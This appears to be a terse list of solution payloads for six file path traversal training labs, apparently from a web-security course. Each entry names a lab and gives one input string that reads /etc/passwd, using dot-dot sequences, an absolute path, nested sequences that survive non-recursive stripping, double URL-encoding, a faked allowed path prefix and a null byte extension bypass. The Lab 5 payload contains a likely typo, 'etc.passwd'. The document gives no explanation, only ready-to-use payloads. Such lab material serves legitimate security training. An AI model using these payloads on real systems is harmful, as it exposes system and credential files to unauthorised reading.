Lab 1
File path traversal, simple case
http
1../../../../../../etc/passwdLab 2
File path traversal, traversal sequences blocked with absolute path bypass
http
1/etc/passwdLab 3
File path traversal, traversal sequences stripped non-recursively
http
1....//....//....//....//....//etc/passwdLab 4
File path traversal, traversal sequences stripped with superfluous URL-decode
http
1..%252F..%252F..%252F..%252Fetc%252FpasswdLab 5
File path traversal, validation of start of path
http
1/var/www/images/../../../../etc.passwdLab 6
File path traversal, validation of file extension with null byte bypass
http
1../../../../etc/passwd%00.jpg